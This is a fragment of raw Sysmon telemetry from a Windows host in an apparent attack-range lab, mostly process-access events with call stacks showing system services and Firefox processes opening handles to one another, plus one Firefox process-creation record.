Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla 
Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\xul.dll+f54b6e|C:\Program Files\Mozilla Firefox\xul.dll+f725f9|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla 
Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.626{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.0.1858115837\624602239" -parentBuildID 20210105180113 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 1 -prefMapSize 229288 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 1944 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.583{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.583{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.583{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.239{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.239{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.239{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.192{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:56.192{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.192{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program 
Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla 
Firefox\xul.dll+3cbcd09 10341000x800000000000000016847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program 
Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla 
Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program 